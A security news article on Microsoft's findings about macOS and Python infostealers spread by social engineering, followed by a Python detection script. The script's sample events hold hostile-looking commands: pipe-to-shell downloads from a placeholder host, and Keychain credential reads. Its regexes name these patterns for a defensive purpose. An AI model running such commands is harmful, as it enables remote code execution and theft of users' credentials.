Microsoft Warns macOS Users As Social Engineering Fuels Infostealer Attacks

New research highlights cross-platform malware using Python, social engineering, and platform abuse

Published on Feb 4, 2026

macOS Users Increasingly Targeted By Social Engineering And Infostealers

Microsoft has warned security leaders that infostealer malware is no longer a Windows-only problem. New findings from Microsoft Defender Experts show attackers increasingly targeting macOS systems while abusing trusted applications and cross-platform tools to steal credentials at scale.

In a recent Microsoft Security Blog post, researchers outlined how threat actors are shifting tactics to blend malware delivery into legitimate user workflows.

Since late 2025, Microsoft has observed macOS-focused infostealer campaigns relying on deceptive advertising, fake software installers, and “ClickFix” techniques that persuade users to manually run malicious commands.

These attacks do not exploit known software vulnerabilities. Instead, they rely heavily on social engineering to circumvent the security measures put in place to protect against malware.

Once installed, macOS infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer extract browser credentials, cloud tokens, cryptocurrency wallet data, and developer secrets from native macOS components such as the Keychain.

Python and Platform Abuse Increase Operational Risk

Microsoft also reported a surge in Python-based infostealers: “This gravitation towards Python is driven by ease of use and the availability of tools and frameworks allowing quick development, even for individuals with limited coding knowledge,” the tech giant wrote.

These types of malware are typically distributed via phishing email campaigns and capture login credentials, session cookies, financial information, and cryptocurrency wallet data. To make their infrastructure harder to trace, attackers often use legitimate services such as Telegram for command-and-control (C2) communications.

Platform abuse is compounding the problem. Microsoft observed campaigns that weaponized WhatsApp automation tools to spread malware laterally through contact lists, as well as fake PDF utilities promoted via search engine ads to distribute credential stealers.

Microsoft recommends that organizations implement additional user education and awareness training, monitor scripting and terminal activity occurring on macOS devices, and configure their Endpoint Detection and Response (EDR) solutions to detect fileless execution and unusual credential access attempts.
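As an added illustration of the monitoring Microsoft recommends (example code written for this page, not Microsoft's or any vendor's tooling), the following Python triage function scans constructed process-creation events and flags two of the behaviours described above: a ClickFix-style pasted pipeline that downloads or decodes content straight into a shell, and Keychain access initiated from a script rather than from an interactive session. The event fields, process names, and sample records are assumptions.

```python
import re

# Constructed sample process-creation events (hypothetical EDR telemetry, not real data).
SAMPLE_EVENTS = [
    {"parent": "Terminal", "proc": "zsh", "cmd": "echo aGVsbG8= | base64 -d | sh"},
    {"parent": "Terminal", "proc": "bash", "cmd": "curl -fsSL http://example.invalid/x | sh"},
    {"parent": "python3", "proc": "security", "cmd": "security find-generic-password -a alice"},
    {"parent": "Terminal", "proc": "zsh", "cmd": "ls -la ~/Projects"},
    {"parent": "launchd", "proc": "Safari", "cmd": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"parent": "osascript", "proc": "cat", "cmd": "cat /Users/alice/Library/Keychains/login.keychain-db"},
]

SHELLS = {"sh", "bash", "zsh"}
# Interpreters that, as the parent of a Keychain query, indicate script-driven credential access.
SCRIPT_INTERPRETERS = {"python", "python3", "osascript", "node", "perl", "ruby"}

# Download-and-execute or decode-and-execute pipelines typical of pasted ClickFix commands.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget|base64)\b[^|]*\|\s*(sh|bash|zsh|python3?)\b")
# The macOS `security` CLI subcommands that read secrets out of the Keychain.
KEYCHAIN_CLI = re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)\b")
# Direct reads of the on-disk Keychain database bypass the `security` CLI entirely.
KEYCHAIN_PATH = re.compile(r"/Library/Keychains/")


def classify(event):
    """Return the list of alert tags raised by one process-creation event."""
    tags = []
    cmd = event["cmd"]
    # Rule 1: an interactive shell under Terminal piping fetched/decoded bytes into an interpreter.
    if event["proc"] in SHELLS and event["parent"] == "Terminal" and PIPE_TO_SHELL.search(cmd):
        tags.append("clickfix_pipe_to_shell")
    # Rule 2: Keychain queried via the CLI, but driven by a scripting interpreter.
    if KEYCHAIN_CLI.search(cmd) and event["parent"] in SCRIPT_INTERPRETERS:
        tags.append("keychain_cli_from_script")
    # Rule 3: anything other than the system daemon touching the Keychain file itself.
    if KEYCHAIN_PATH.search(cmd) and event["proc"] != "securityd":
        tags.append("keychain_file_read")
    return tags


def scan(events):
    """Map event index -> alert tags for every event that raised at least one tag."""
    findings = {}
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            findings[i] = tags
    return findings
```

In a real deployment the same rules would be expressed in the EDR's query language and tuned against the organisation's own baseline of legitimate `security` usage.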